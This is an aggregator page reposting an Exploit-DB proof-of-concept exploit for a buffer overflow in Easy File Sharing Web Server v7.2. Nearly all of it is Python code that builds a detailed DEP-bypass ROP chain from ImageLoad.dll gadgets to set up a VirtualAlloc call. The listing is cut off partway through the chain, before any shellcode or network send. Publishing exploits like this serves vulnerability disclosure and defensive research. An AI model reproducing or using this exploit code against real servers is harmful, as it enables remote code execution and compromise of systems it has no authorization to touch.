Security News

Cybersecurity news aggregator

MEDIUM | Vulnerabilities | Exploit-DB

[webapps] Easy File Sharing Web Server v7.2 - Buffer Overflow

  • What: Buffer overflow vulnerability in Easy File Sharing Web Server
  • Impact: Potential for remote code execution

Exploit-DB entry details:

  • EDB-ID: 52484
  • CVE: N/A
  • EDB Verified:
  • Author: DIOGO
  • Type: WEBAPPS
  • Platform: MULTIPLE
  • Date: 2026-03-03

Exploit code as published on Exploit-DB (the listing on this page is cut off before the end of the ROP chain; the final line is truncated as it appears in the source):

# Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow
# Date: 16/10/2025
# Exploit Author: Donwor
# X: @real_Donwor
# Discord: Donwor
# Website: https://github.com/D0nw0r
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 10,11
#
# Notes:
# - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others.
# - The ROP chain was VERY challenging to build, mainly because there were a lot of limitations when moving data between for example EAX and ESI
# - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/)
# - bad chars: '\x00' and '\x3b'

import struct, sys, socket

host = sys.argv[1]
port = 80
size = 5000

rop = struct.pack("<I", 0x1001ba81)   # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141)  # junk for pop edi
rop += struct.pack("<I", 0x41414141)  # junk for pop esi
rop += struct.pack("<I", 0x41414141)  # junk for pop ebp
rop += struct.pack("<I", 0x1001db66)  # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0xffffeff8)  # pop esi to align eax, will point after the hybjks
rop += struct.pack("<I", 0x10022f45)  # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141)  # junk for pop edi
rop += struct.pack("<I", 0x41414141)  # junk for pop esi
rop += struct.pack("<L", 0x61c0a798)  # XCHG EAX,EDI # RETN
rop += struct.pack("<L", 0x1001d626)  # XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e)  # (RVA : 0x00021a3e) ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
## Save ESP on ESI and EDI
rop += struct.pack("<L", 0x10015442)  # POP EAX # RETN
rop += struct.pack("<L", 0x1004D1FC)  # VirtualAlloc Addr on IAT
rop += struct.pack("<L", 0x1002248c)  # deref VirtualAlloc: MOV EAX,DWORD PTR [EAX] # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3)  # put virtualalloc addr on stack: MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141)  # junk pop esi
rop += struct.pack("<L", 0x41414141)  # junk pop ebx
rop += struct.pack("<L", 0x1001d626)  # prepare esi for another round: XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e)  # put original stack pointer in esi (RVA : 0x00021a3e): ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)  # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d): INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
# Virtual Alloc on stack
# Esi now has "SRP" we need to fill it
# EDI still points to original one (Virtual alloc)
rop += struct.pack("<L", 0x1001f595)  # Put SRP addr on eax: MOV EAX,ESI # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141)  # junk pop esi
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457)  # eax now points to x more (can be changed)
rop += struct.pack("<L", 0x1001d626)  # prepare esi for another round: XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e)  # put original stack pointer in esi: ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001e80b)  # This immediately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141)  # junk pop esi
# Virtual alloc | SRP | Shellcode Addr
# edi -> virtualalloc
rop += struct.pack("<L", 0x1001d626)  # prepare esi for another round: XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e)  # put original stack pointer in esi: ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)  # increase esi to point 12 bytes more (->dwSize): INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001c15d)  # XOR EAX,EAX # RETN
rop += struct.pack("<L", 0x10015442)  # POP EAX # RETN
rop += struct.pack("<L", 0xffffffff)  # -1
rop += struct.pack("<L", 0x100231d1)  # will turn eax into 1, second arg of virtualalloc: NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3)  # patch arg: MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141)  # junk pop esi
rop += struct.pack("<L", 0x41414141)  # junk pop ebx
# VirtualAlloc | SRP | ShellcodeAddr | dwSize
# edi -> virtualalloc
rop += struct.pack("<L", 0x1001d626)  # prepare esi for another round: XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e)  # put original stack pointer in esi: ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)  # increase esi to point 16 bytes more (->flAllocationType): INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x10015442)  # POP EAX # RETN
rop += struct.pack("<I", 0xffffefff)  # value to pop eax now
rop += struct.pack("<L", 0x100231d1)  # will turn eax into 0x1001: NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x1001b7ca)  # eax now 0x1000: DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3)  # patch arg: MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141)  # junk pop esi
rop += struct.pack("<L", 0x41414141)  # junk pop ebx
# VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType
# edi -> virtualalloc
rop += struct.pack("<L", 0x1001d626)  # prepare esi for another round: XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e)  # put original stack pointer in esi: ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)  # increase esi to point 20 bytes more (->flProtect): INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d)
rop += struct.pack("<L", 0x1001715d
